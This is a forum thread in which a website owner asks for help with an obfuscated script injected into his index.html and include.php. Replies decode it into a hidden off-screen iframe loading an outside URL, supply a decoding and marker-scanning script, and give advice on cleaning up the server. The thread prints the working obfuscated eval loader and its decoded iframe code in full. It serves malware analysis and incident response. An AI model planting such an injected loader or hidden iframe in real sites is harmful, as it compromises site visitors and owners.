LinuxQuestions.org

Programming > Strange script on FTP? (https://www.linuxquestions.org/questions/programming-9/strange-script-on-ftp-4175438161/)

LukasH 11-21-2012 12:59 PM

Strange script on FTP?
 
Hello everyone,

I discovered a strange code/script/whatever on my FTP, it was added to my index.html. I think this is a pretty bad malware script (since both Chrome and my antivirus software absolutely do not like it), and I also think that all those numbers included can be "translated" or "decoded". I also tried googling for an ASCII converter, but I couldn't translate it. Can you guys help me out?

Thanks in advance,

Lukas

Code:

<!--c3284d--><script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,90,94,86,92,98,98,88,112,106,105,36,99,92,106,36,111,99,97,37,102,93,103,24,48,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105,37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script><!--/c3284d-->

And if you have any further information on what to do, please feel free to reply or send me a PM. This is very urgent for me so please, please help!!!

goossen 11-21-2012 01:27 PM

Basically it places an ad on your site. It runs JavaScript that creates an iframe with a URL containing the ad.

firstfire 11-21-2012 01:29 PM

Hi.

Here is an almost equivalent Python script with less obfuscation:
Code:

f = [4, 0, 91, 108, 100, 88, 107, 95, 100, 101, 22, 91, 105, 99, 54, 91, 90,
      29, 32, 22, 112, 4, 0, 107, 88, 104, 21, 96, 92, 103, 100, 22, 50, 23,
      90, 100, 90, 107, 98, 92, 100, 105, 37, 89, 103, 92, 87, 105, 92, 59,
      97, 92, 99, 90, 101, 106, 29, 30, 95, 91, 105, 87, 98, 92, 29, 30, 50,
      3, -1, 96, 92, 103, 100, 36, 104, 107, 111, 97, 92, 36, 101, 102, 105,
      94, 107, 95, 100, 101, 51, 28, 88, 88, 104, 102, 98, 106, 107, 91, 28,
      50, 3, -1, 96, 92, 103, 100, 36, 104, 107, 111, 97, 92, 36, 105, 102,
      102, 50, 30, 35, 46, 48, 47, 90, 100, 29, 48, 4, 0, 94, 93, 104, 98,
      37, 105, 105, 112, 98, 90, 37, 98, 90, 93, 106, 50, 30, 35, 46, 48, 47,
      90, 100, 29, 48, 4, 0, 94, 93, 104, 98, 37, 105, 103, 90, 22, 21, 52,
      22, 23, 95, 106, 105, 103, 48, 36, 38, 99, 94, 90, 94, 86, 92, 98, 98,
      88, 112, 106, 105, 36, 99, 92, 106, 36, 111, 99, 97, 37, 102, 93, 103,
      24, 48, 4, 0, 94, 93, 104, 98, 37, 95, 89, 23, 51, 21, 30, 92, 103,
      100, 63, 89, 30, 49, 2, 1, 90, 100, 90, 107, 98, 92, 100, 105, 37, 88,
      100, 91, 111, 35, 88, 102, 101, 92, 100, 89, 58, 94, 94, 99, 90, 29,
      96, 92, 103, 100, 31, 48, 4, 0, 114, 50, 3, -1, 110, 95, 99, 91, 101,
      108, 37, 101, 99, 99, 101, 86, 91, 22, 50, 23, 92, 103, 100, 55, 89,
      91, 49, 2, 1];

# Same mapping as the JS loop: s += String.fromCharCode(w[j]*1 + (9 + j%3))
s = ""
for i in range(286):
    s += chr(f[i] + 9 + i % 3)

print(s)

and here is the result:
Code:


function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src  = "http://michaelmazur.net/xml.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;

This script gets evaluated.

goossen 11-21-2012 01:30 PM

Here is how to decode it. :)

LukasH 11-21-2012 01:34 PM

Thanks already!

But now, is that a good thing or a bad thing?

Also, I found this in my include.php page:

Code:

#c3284d#
echo(gzinflate(base64_decode("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")));
#/c3284d#

I tried to decode it via googling for a base64 decoder, but couldn't get a good decoding :(. What does this thing do?

firstfire 11-21-2012 02:01 PM

Hi.

Uncompressing gives the same script:
Code:

<script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,90,94,86,92,98,98,88,112,106,105,36,99,92,106,36,111,99,97,37,102,93,103,24,48,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105,37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script>
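As an added example (not firstfire's or goossen's code), both decoding steps from this thread in one script: it pulls the `f=[...]` array out of the injected `<script>`, applies the same `f[j] + 9 + j%3` mapping the JS loop uses, and replaces PHP's `gzinflate(base64_decode(...))` with zlib raw-deflate decompression so the include.php payload can be read without executing it. The sample input is constructed from the first ten numbers of the array on the page (they decode to "\r\nfunction"); the marker scan lists files carrying the `c3284d` tags before cleanup.

```python
import base64
import re
import zlib

# Constructed sample: the first ten numbers of the page's array inside the
# same <!--c3284d--> wrapper the injected index.html used.
SAMPLE_JS = ('<!--c3284d--><script>if(x){fr="fromChar";'
             'f=[4,0,91,108,100,88,107,95,100,101];v="eva";}</script><!--/c3284d-->')

ARRAY_RE = re.compile(r'\bf=\[(-?\d+(?:,-?\d+)*)\]')

def extract_array(js):
    """Pull the numeric array out of the 'f=[...]' assignment in the injected script."""
    m = ARRAY_RE.search(js)
    if not m:
        return None
    return [int(n) for n in m.group(1).split(',')]

def decode_array(nums):
    """Mirror of the JS loop: char j is f[j] + 9 + (j % 3), fed to String.fromCharCode."""
    return ''.join(chr(n + 9 + (i % 3)) for i, n in enumerate(nums))

def gzinflate(data):
    """Python equivalent of PHP gzinflate(): raw DEFLATE without zlib/gzip header (wbits=-15)."""
    return zlib.decompress(data, -15)

def decode_php_payload(b64):
    """Undo echo(gzinflate(base64_decode(...))) on paper, without evaluating the result."""
    return gzinflate(base64.b64decode(b64)).decode('utf-8', errors='replace')

def make_php_payload(text):
    """Inverse of decode_php_payload; used here only to build a constructed test payload."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = co.compress(text.encode('utf-8')) + co.flush()
    return base64.b64encode(raw).decode('ascii')

INJECTION_MARKERS = (
    re.compile(r'<!--c3284d-->'),
    re.compile(r'#c3284d#'),
    re.compile(r'gzinflate\s*\(\s*base64_decode\s*\('),
)

def find_injection(text):
    """Return the marker patterns present, so infected files can be listed before cleanup."""
    return [p.pattern for p in INJECTION_MARKERS if p.search(text)]

if __name__ == '__main__':
    print(repr(decode_array(extract_array(SAMPLE_JS))))   # '\r\nfunction'
    print(find_injection(SAMPLE_JS))
    print(decode_php_payload(make_php_payload(SAMPLE_JS)) == SAMPLE_JS)
```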


unSpawn 11-21-2012 02:17 PM

Quote:

Originally Posted by LukasH (Post 4834254)
is that a good thing or a bad thing?

Bad. Basically somebody exploited a loophole to inject ads in whatever you run. Both goossen and firstfire should have followed up by pointing that out. BTW uploading via FTP is a real classic one but it may not be the only infection vector. Cleaning up your include and rendered pages will not be enough. Find out where you run things (home, shared hosting, VPS, etc), what you run (CMS, web log, statistics, 3rd party plugins) and their versions (either current and maintained or obsolete, deprecated) plus check service access via SSH and obviously FTP.

LukasH 11-28-2012 05:41 AM

Umm. I would then prefer just to clean up the files that are infected with that evil, evil bastard, clean up the complete server and renew some passwords, and then get the files back up and running.

If that is not a good idea, please prevent me from doing that by giving a quick answer ;). Thanks!

